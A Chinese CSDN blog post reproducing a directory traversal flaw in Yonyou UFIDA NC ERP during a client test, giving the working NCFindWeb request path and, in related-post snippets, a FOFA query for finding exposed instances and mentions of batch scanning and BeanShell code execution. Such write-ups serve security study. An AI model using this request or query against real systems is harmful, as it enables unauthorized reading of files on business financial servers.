用友UFIDA NC目录遍历漏洞

已于 2024-12-12 10:53:47 修改
阅读量381 收藏
点赞数 1
分类专栏: 实战 文章标签: 安全
于 2024-12-12 10:43:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_61496153/article/details/144418509
版权

现场测试客户的一个财务信息化系统。

访问站点:

用友NC是一款企业级ERP软件。包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源等管理模块,支持企业的全面管理和高效运营。

该产品存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。

漏洞复现

poc

/NCFindWeb?service=IPreAlertConfigService&filename

 在url处拼接poc,可看到该站点的目录和文件

filename后面拼接要读取的文件名,即可读取文件

/NCFindWeb?service=IPreAlertConfigService&filename=

用友OA漏洞学习——NCFindWeb 目录遍历漏洞
记录并分享学习安全的知识点..
07-03 1565
用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。
用友 UFIDA NC portal/file 任意文件读取漏洞(含批量验证poc)
weixin_43567873的博客
04-18 369
用友 UFIDA NC portal/file 任意文件读取漏洞(含批量验证poc)
SRC-用友 ERP-NC NCFindWeb 目录遍历漏洞
hackzkaq的博客
11-06 1276
NCFindWeb?service=IPreAlertConfigService&filename=文件名。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。if判断返回的数据出现index.html文件名则代表存在漏洞,否则不存在。在url处拼接poc后可以看到该站点的目录和文件。这里使用的是pocsuite3的poc模板。只需要修改_verify()部分即可。
用友NC目录遍历漏洞
最新发布
2302_80982453的博客
03-30 174
app="用友-UFIDA-NC"
漏洞挖掘姿势之-用友NC目录遍历
Grace_for_it的博客
05-19 511
渗透测试 漏洞验证 用友NC
用友NC 漏洞
2301_80115097的博客
12-01 689
NCFindWeb?service=IPreAlertConfigService&filename=文件名。用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。if判断返回的数据出现index.html文件名则代表存在漏洞,否则不存在。在url处拼接poc后可以看到该站点的目录和文件。这里使用的是pocsuite3的poc模板。只需要修改_verify()部分即可。使用pocsuite3批量验证。
用友NC目录遍历漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-18 2548
简介: 用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。 漏洞复现: fofa直接搜索: app="用友-UFIDA-NC" 漏洞拼接目录: /NCFindWeb?service=IPreAlertConfigService&filename /NCFindWeb?service=IPreAlertConfigService&filename= 读取:filename=读取的文件名 ...
用友OA漏洞复现手册
热门推荐
1stPeak's Blog
04-20 1万+
用友OA漏洞复现手册 前言:用友OA产品漏洞复现笔记,供自己使用,不定期更新
漏洞复现-用友UFIDA-YongYou系列
aming小老弟
10-03 2271
UFIDA是中国的一家知名企业软件公司,全称为用友软件股份有限公司(Yonyou Software Co . , Ltd . )。该公司成立于 1988 年,总部位于北京,是中国领先的企业管理软件和云服务提供商之一。UFIDA主要专注于开发和提供企业级软件解决方案,包括财务管理、人力资源管理、采购管理、销售管理、供应链管理、生产制造管理等。它的产品被广泛应用于各种行业,如制造业、服务业、金融业、医疗保健和公共事业等。UFIDA致力于帮助企业提高管理效率、优化业务流程,并提供数据分析和决策支持工具。
漏洞库】用友系统
weixin_46301214的博客
12-20 552
漏洞库持续更新中,最后更新日期:2023年12月20日用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞图片加载不出来,以后再写用友 U8 cloud upload.jsp 任意文件上传漏洞
#渗透测试#批量漏洞挖掘#用友NC——文件上传漏洞
soc的博客
02-19 878
用友NCUFIDA NC)是用友软件公司推出的一款企业级管理软件,主要用于帮助企业实现财务管理、供应链管理、生产管理、项目管理、人力资源管理等业务的集成管理。
Java反序列化攻击
01-21
Java 反序列化攻击漏洞由FoxGlove 的近的一篇博文爆出,该漏洞可以被黑客利用向服务器上传恶意脚本,或者远程执行命令。   由于目前发现该漏洞存在于 Apache commons-collections, Apache xalan 和 Groovy 包中,也意味着使用了这些包的服务器(目前发现有WebSphere, WebLogic,JBoss),第三方框架(Spring,Groovy),第三方应用(Jenkins),以及依赖于这些服务器,框架或者直接/间接引用这些包的应用都会受到威胁,这样的应用的数量会以百万计。   说到漏洞存在的原因,根本还在于 Java 序列化自身的缺陷,众
自动化部署用友NC:编写高效安装脚本的终极指南
本论文旨在详细介绍自动化部署用友NC系统的全过程,包括理论基础、安装脚本的编写实践、高级功能开发以及安全性与合规性问题。首先,对用友NC软件架构进行了深入分析,并阐释了安装脚本编写的理论原则。随后,通过...
用友NC的一些漏洞复现
yzl_007的博客
12-15 1万+
用友NC的一些漏洞复现 一、BeanShell Test Servlet命令执行 漏洞介绍:用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。 影响范围:NC 6.5版本 复现过程: 访问对应网站后界面如下: 漏洞url就是:ip地址:端口/servlet/~ic/bsh.servlet.BshServlet 后续还可以写shell进去,但是这里不
用友ERP-NC 目录遍历
平凡
08-20 453
子夏曰:“贤贤易色,事父母能竭其力,事君能致其身,与朋友交,言而有信,虽曰未学,吾必谓之学矣。”
SRC日常捡洞之某集团任意文件读取&RCE漏洞,从零基础到精通,收藏这篇就够了!_用户nc系统 rec 漏洞
喜欢Python编程的程序员柚柚呀
03-17 1204
一直觉得,若能找一静僻之地,静心,静悟,静静思考,时时看看美丽的苍穹,时而品品手中的香茗,时而挥洒手中的笔墨,时而让钢笔在纸上舞动,在配以安静的乐曲,静静的,静静的,想想白天,想想生活,想想每一个人,那就好了。各地疫情有点严重,这几天社区封控也被圈家里出不去,听说隔壁楼有阳性,第一次疫情离的这么近,其实内心一点也不慌,常态而已。接下来我们说一下任意文件读取和RCE漏洞,这两个漏洞都是关于用友NC的。
【1】高危漏洞利用工具 (2023.1.6更新)-- Apt_t00ls
司徒荆的博客
01-09 1822
ATP-tools 增加CNVD-2023-00895 包括:泛微、蓝凌、用友、万户、致远、通达、中间件、安全设备等多个高位漏洞
用30行代码开发一个上传、下载文件的接口
weixin_34342992的博客
12-15 129
分享一段代码,开发了3个接口:1、上传文件2、查看所有文件3、下载文件 使用python开发,需要安装flask模块,使用pip install flask安装即可,代码量特别少,就能实现,加上注释总共35行代码,特别的简单,代码如下: 1 2 3 4 5 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值